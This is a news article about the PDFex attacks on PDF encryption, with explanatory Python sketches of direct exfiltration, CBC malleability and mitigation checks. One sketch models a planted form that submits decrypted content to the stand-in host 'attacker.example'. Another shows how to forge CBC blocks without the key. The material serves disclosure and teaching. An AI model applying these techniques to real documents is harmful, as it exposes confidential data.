PDF flaw lets hackers read password-protected documents, researchers say

Researchers have developed a new technique that allows attackers to extract the contents of a password-protected or encrypted PDF file under certain conditions.

In a paper titled “Practical Decryption exFiltration: Breaking PDF Encryption,” German academics from Ruhr-University Bochum and Münster University of Applied Sciences disclosed two variations of the attack that left more than 23 widely used PDF viewers vulnerable, including Adobe Acrobat Reader, Evince, and the built-in PDF viewers in Chrome and Firefox.

Called PDFex, the attack exploits security weaknesses in the standard encryption protection built into the Portable Document Format, also known as PDF.

The method doesn’t attempt to crack the password of an encrypted PDF document. Rather, it takes advantage of the partial encryption that the PDF specification natively supports to remotely exfiltrate content once a user opens the document.

“Even without knowing the corresponding password, the attacker possessing an encrypted PDF file can manipulate parts of it,” the researchers said. “More precisely, the PDF specification allows the mixing of ciphertexts with plaintexts. In combination with further PDF features which allow the loading of external resources via HTTP, the attacker can run direct exfiltration attacks once a victim opens the file.”

In other words, an attacker can modify a password-protected PDF file in such a way that when it’s opened with the right password, a copy of the decrypted content is automatically transmitted to a remote server controlled by the attacker via a PDF form, URL, or JavaScript code.

More worryingly, direct exfiltration achieved by tampering with the unencrypted plaintext data through PDF forms doesn’t require any user interaction at all.
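
The direct exfiltration idea can be illustrated with a deliberately simplified Python model. It is only a sketch under stated assumptions: the `PdfObject` class, the `open_document` function, the XOR stand-in cipher, and the `attacker.example` URL are all hypothetical and do not reflect real PDF syntax or any viewer's actual code. No network request is made; the model merely records what a viewer would send.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


def xor_cipher(data: bytes, key: bytes) -> bytes:
    """Stand-in for the real cipher: XOR with a repeating key (NOT secure)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


@dataclass
class PdfObject:
    """Hypothetical, heavily simplified model of one object in a PDF file."""
    data: bytes
    encrypted: bool
    submit_url: Optional[str] = None  # set only on an auto-submitting form
    value_ref: Optional[int] = None   # object number used as the form value


def open_document(objects: Dict[int, PdfObject],
                  password: bytes) -> List[Tuple[str, bytes]]:
    """Model a viewer: decrypt encrypted objects, then process any form."""
    plain = {
        number: (xor_cipher(obj.data, password) if obj.encrypted else obj.data)
        for number, obj in objects.items()
    }
    requests = []
    for obj in objects.values():
        if obj.submit_url is not None and obj.value_ref is not None:
            # The form is plaintext, but its value points at decrypted content.
            requests.append((obj.submit_url, plain[obj.value_ref]))
    return requests


password = b"s3cret"
doc = {1: PdfObject(xor_cipher(b"Confidential content", password),
                    encrypted=True)}

# The attacker never learns the password; they only add a plaintext object.
doc[2] = PdfObject(b"", encrypted=False,
                   submit_url="http://attacker.example/collect", value_ref=1)

# The victim opens the file with the correct password.
leaked = open_document(doc, password)
print(leaked)
```

In this model the attacker touches only unencrypted parts of the file, which is why mixing plaintext and ciphertext in one document is the core of the problem.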

The second variation of the attack does something similar, but unlike the first method, it uses only the encrypted parts of the PDF file. It exploits the Cipher Block Chaining (CBC) mode of encryption to transform one piece of ciphertext into another, a property known in cryptography as malleability.

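CBC mode employs a chaining mechanism to encrypt data: each plaintext block is XORed with the immediately preceding ciphertext block before it is encrypted. Because PDF encryption applies CBC without integrity checks, changes to one ciphertext block translate into predictable changes in the next decrypted block. To directly manipulate an encrypted object this way, however, the attacker needs to know a “plaintext segment,” the researchers noted.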
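
The malleability described above can be sketched in a few lines of Python. This is a minimal illustration, not the researchers' exploit: a toy Feistel cipher built on SHA-256 stands in for AES (an assumption made so the example runs with the standard library alone), and all function names are hypothetical. The point is that the weakness comes from the chaining mode, not from the block cipher.

```python
import hashlib
import os

BLOCK = 16  # block size in bytes, matching AES


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([i]) + half).digest()[:BLOCK // 2]


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    """4-round Feistel network; a toy stand-in for AES, NOT secure."""
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, xor(left, _round(key, i, right))
    return left + right


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = xor(right, _round(key, i, left)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = toy_encrypt_block(key, xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out.append(xor(toy_decrypt_block(key, block), prev))
        prev = block
    return b"".join(out)


def make_gadget(prev_block: bytes, known: bytes, wanted: bytes) -> bytes:
    """Alter the preceding block so the next one decrypts to `wanted`."""
    return xor(xor(prev_block, known), wanted)


key, iv = os.urandom(16), os.urandom(16)
known = b"KNOWN PLAINTEXT!"    # 16 bytes the attacker is assumed to know
ciphertext = cbc_encrypt(key, iv, known)

wanted = b"ATTACKER CONTENT"   # 16 bytes chosen by the attacker
forged_iv = make_gadget(iv, known, wanted)  # computed without the key

recovered = cbc_decrypt(key, forged_iv, ciphertext)
print(recovered)
```

The forged block is computed purely by XORing values the attacker already has, which is why knowing a plaintext segment is the prerequisite and why the absence of an integrity check matters.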

The academics have responsibly disclosed their findings to all affected vendors and also released proof-of-concept exploits for PDFex attacks to the public.

“Many data formats allow to encrypt only parts of the content (e.g., XML, S/MIME, PDF),” the team said. “This encryption flexibility is difficult to handle and allows an attacker to include their own content, which can lead to exfiltration channels.”

To mitigate the attack, the researchers suggest dropping support for partially encrypted PDF files, or enforcing a policy where unencrypted objects are not allowed to access encrypted content.
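
Both suggested mitigations amount to simple checks over a document's objects. The following Python sketch shows the idea on a toy object model; the `Obj` class and both function names are hypothetical, and a real viewer would need to apply such checks to actual PDF structures, which are considerably more involved.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class Obj:
    """Hypothetical simplified object: an encryption flag plus references."""
    encrypted: bool
    refs: List[int] = field(default_factory=list)


def is_partially_encrypted(objects: Dict[int, Obj]) -> bool:
    """First mitigation: detect documents that mix both kinds of object."""
    return len({obj.encrypted for obj in objects.values()}) > 1


def policy_violations(objects: Dict[int, Obj]) -> List[Tuple[int, int]]:
    """Second mitigation: list (plaintext object, encrypted target) pairs."""
    return [
        (number, ref)
        for number, obj in sorted(objects.items())
        if not obj.encrypted
        for ref in obj.refs
        if objects[ref].encrypted
    ]


doc = {
    1: Obj(encrypted=True),             # confidential content
    2: Obj(encrypted=False, refs=[1]),  # plaintext object reaching into it
    3: Obj(encrypted=False),            # harmless plaintext object
}

mixed = is_partially_encrypted(doc)
violations = policy_violations(doc)
print(mixed, violations)
```

A viewer following the stricter policy would refuse to open the document when `mixed` is true; one following the second policy would refuse only when `violations` is non-empty.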

“In the long term, the PDF 2.x specification should drop support for mixed content altogether,” they concluded, adding that the plethora of PDF features, together with the flexibility of the format, makes it susceptible to plaintext exfiltration attacks.